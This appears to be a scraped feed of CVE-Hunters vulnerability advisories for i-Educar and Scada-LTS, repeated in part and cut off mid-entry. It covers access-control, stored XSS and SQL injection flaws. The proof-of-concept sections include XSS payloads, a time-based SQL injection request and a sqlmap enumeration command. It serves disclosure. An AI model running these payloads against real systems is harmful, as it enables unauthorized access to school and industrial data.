id="cve-2025-9609-missing-function-level-access-control-in-educacensoconsulta-endpoint">CVE-2025-9609: Missing Function-Level Access Control in <code>/educacenso/consulta</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9609" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9609</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/educacenso/consulta</code> endpoint of the i-Educar application. This issue allows authenticated users without the required role to access functionalities or data that should be restricted, resulting in an elevation of privilege and unauthorized access.</p> <h2 id="details">Details </h2><p><strong>Vulnerable Endpoint:</strong> <code>GET /educacenso/consulta</code></p> <p><strong>Authentication:</strong> Required (but insufficient authorization checks)</p> <p><strong>Role required:</strong> Just app access</p><h2 id="cve-2025-9609-missing-function-level-access-control-in-educacensoconsulta-endpoint">CVE-2025-9609: Missing Function-Level Access Control in <code>/educacenso/consulta</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9609" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9609</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/educacenso/consulta</code> endpoint of the i-Educar application. This issue allows authenticated users without the required role to access functionalities or data that should be restricted, resulting in an elevation of privilege and unauthorized access.</p> <h2 id="details">Details </h2><p><strong>Vulnerable Endpoint:</strong> <code>GET /educacenso/consulta</code></p> <p><strong>Authentication:</strong> Required (but insufficient authorization checks)</p> <p><strong>Role required:</strong> Just app access</p> <p><strong>Affected scenario:</strong> A user without the required role is still able to directly access the endpoint.</p> <p style="text-align: justify;">The application fails to enforce proper role-based access control (RBAC) on the <code>/educacenso/consulta</code> endpoint. As a result, users with lower privilege levels can access sensitive data and functionalities that should be restricted to higher-privileged roles.</p> <h2 id="poc">PoC </h2><p>Request using a session from a user without the Educacenso role:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /educacenso/consulta HTTP/1.1 Host: <span class="p"><</span><span class="nt">target</span><span class="p">></span> Cookie: PHPSESSID=<span class="p"><</span><span class="nt">low_privileged_session</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9609/image.png" width="1575" height="708" srcset="/p/cve-2025-9609/image_hu_342a2b269456c359.png 480w, /p/cve-2025-9609/image_hu_78d6f5df22994203.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="222" data-flex-basis="533px" /></p> <p><strong>Observed Result:</strong> The server responds with HTTP 200 and returns restricted content.</p> <p><strong>Expected Result:</strong> The server should respond with HTTP 403 (Forbidden).</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive educational census data;</li> <li>Elevation of privilege from a basic user to roles with access to restricted modules;</li> <li>Potential manipulation of sensitive data if write operations are accessible;</li> <li>Breach of confidentiality and integrity of protected information;</li> <li>Compliance violations if sensitive personal data is exposed to unauthorized users.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9652/ https://www.cvehunters.com/p/cve-2025-9652/ <h2 id="cve-2025-9652-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_transferencia_tipo_cadphp">CVE-2025-9652: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_transferencia_tipo_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9652" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9652</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_transferencia_tipo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> and <code>desc_tipo</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_transferencia_tipo_cad.php</code></p><h2 id="cve-2025-9652-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_transferencia_tipo_cadphp">CVE-2025-9652: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_transferencia_tipo_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9652" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9652</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_transferencia_tipo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> and <code>desc_tipo</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_transferencia_tipo_cad.php</code></p> <p>Parameters: <code>nm_tipo</code> and <code>desc_tipo</code></p> <p>Other Affected Endpoint: <code>/intranet/educar_transferencia_tipo_det.php?cod_transferencia_tipo=[id]</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_tipo</code> and <code>desc_tipo</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9652/image.png" width="741" height="592" srcset="/p/cve-2025-9652/image_hu_c6ccac438811cb73.png 480w, /p/cve-2025-9652/image_hu_f23a6e3e10957c05.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="125" data-flex-basis="300px" /></p> <p><img src="/p/cve-2025-9652/image-1.png" width="738" height="341" srcset="/p/cve-2025-9652/image-1_hu_45b054bc4c59654b.png 480w, /p/cve-2025-9652/image-1_hu_4ed8f53b57d99036.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <p><img src="/p/cve-2025-9652/image-2.png" width="690" height="281" srcset="/p/cve-2025-9652/image-2_hu_c194e94dc6a4b0fd.png 480w, /p/cve-2025-9652/image-2_hu_8375d7eb45ee1d31.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="245" data-flex-basis="589px" /></p> <p><img src="/p/cve-2025-9652/image-3.png" width="661" height="317" srcset="/p/cve-2025-9652/image-3_hu_8eb960a4b7cdc869.png 480w, /p/cve-2025-9652/image-3_hu_439d0daf74e59258.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="208" data-flex-basis="500px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9653/ https://www.cvehunters.com/p/cve-2025-9653/ <h2 id="cve-2025-9653-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_projeto_cadphp">CVE-2025-9653: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_projeto_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9653" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9653</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_projeto_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>observacao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_projeto_cad.php</code></p><h2 id="cve-2025-9653-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_projeto_cadphp">CVE-2025-9653: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_projeto_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9653" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9653</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_projeto_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>observacao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_projeto_cad.php</code></p> <p>Parameters: <code>nome</code> and <code>observacao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> and <code>observacao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9653/image.png" width="679" height="308" srcset="/p/cve-2025-9653/image_hu_ff92ad4a0e5a10c8.png 480w, /p/cve-2025-9653/image_hu_874ab00290986bd0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="220" data-flex-basis="529px" /></p> <p><img src="/p/cve-2025-9653/image-1.png" width="649" height="281" srcset="/p/cve-2025-9653/image-1_hu_767cf2003758e659.png 480w, /p/cve-2025-9653/image-1_hu_3ac528eecbe71f7b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="230" data-flex-basis="554px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9531/ https://www.cvehunters.com/p/cve-2025-9531/ <h2 id="cve-2025-9531-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agendaphp-endpoint">CVE-2025-9531: SQL Injection (Blind Time-Based) Vulnerability in <code>cod_agenda</code> Parameter on <code>agenda.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9531</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>cod_agenda</code> parameter of the <code>agenda.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>cod_agenda</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9531-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agendaphp-endpoint">CVE-2025-9531: SQL Injection (Blind Time-Based) Vulnerability in <code>cod_agenda</code> Parameter on <code>agenda.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9531</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>cod_agenda</code> parameter of the <code>agenda.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>cod_agenda</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>agenda.php</code></p> <p>Parameter: <code>cod_agenda</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND 'xiCO'='xiCO </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost:8086 </span></span><span class="line"><span class="cl">sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <h3 id="normal-request">Normal request: </h3><p><img src="/p/cve-2025-9531/image.png" width="755" height="463" srcset="/p/cve-2025-9531/image_hu_ad6bd9751fe854f9.png 480w, /p/cve-2025-9531/image_hu_c861952455d3f9c2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="163" data-flex-basis="391px" /></p> <h3 id="sqli-request">SQLi Request: </h3><p><img src="/p/cve-2025-9531/image-1.png" width="749" height="471" srcset="/p/cve-2025-9531/image-1_hu_d6a9f2422248cbd0.png 480w, /p/cve-2025-9531/image-1_hu_8485356e4f83ee41.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="159" data-flex-basis="381px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 27 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9532/ https://www.cvehunters.com/p/cve-2025-9532/ <h2 id="cve-2025-9532-sql-injection-boolean-based-vulnerability-in-id-parameter-on-regraavaliacaoviewidid-endpoint">CVE-2025-9532: SQL Injection (Boolean-Based) Vulnerability in <code>id</code> Parameter on <code>RegraAvaliacao/view?id=[id]</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9532" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9532</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>RegraAvaliacao/view?id=[id]</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9532-sql-injection-boolean-based-vulnerability-in-id-parameter-on-regraavaliacaoviewidid-endpoint">CVE-2025-9532: SQL Injection (Boolean-Based) Vulnerability in <code>id</code> Parameter on <code>RegraAvaliacao/view?id=[id]</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9532" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9532</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>RegraAvaliacao/view?id=[id]</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>RegraAvaliacao/view?id=[id]</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -u "http://localhost:8086/module/RegraAvaliacao/view?id=1" -p id --cookie="i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K" \ --dbms=PostgreSQL --technique=B --dbs --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9532/image.png" width="643" height="181" srcset="/p/cve-2025-9532/image_hu_916de85146360227.png 480w, /p/cve-2025-9532/image_hu_f7d5ec59efe01a20.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="852px" /></p> <p><img src="/p/cve-2025-9532/image-1.png" width="435" height="330" srcset="/p/cve-2025-9532/image-1_hu_a62c4634acc8c2b6.png 480w, /p/cve-2025-9532/image-1_hu_5b7f6002eccfaf96.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="316px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9532.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9532.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 27 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9388/ https://www.cvehunters.com/p/cve-2025-9388/ <h2 id="cve-2025-9388-cross-site-scripting-xss-stored-endpoint-watch_listshtm-parameter-name">CVE-2025-9388: Cross-Site Scripting (XSS) Stored endpoint <code>watch_list.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9388" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9388</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>watch_list.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>watch_list.shtm</code></p><h2 id="cve-2025-9388-cross-site-scripting-xss-stored-endpoint-watch_listshtm-parameter-name">CVE-2025-9388: Cross-Site Scripting (XSS) Stored endpoint <code>watch_list.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9388" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9388</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>watch_list.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>watch_list.shtm</code></p> <p>Parameter: <code>name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("Watchlist")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9388/image.png" width="819" height="421" srcset="/p/cve-2025-9388/image_hu_c2cefdeb719d4d72.png 480w, /p/cve-2025-9388/image_hu_50dc5afcdb9bf712.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="194" data-flex-basis="466px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" 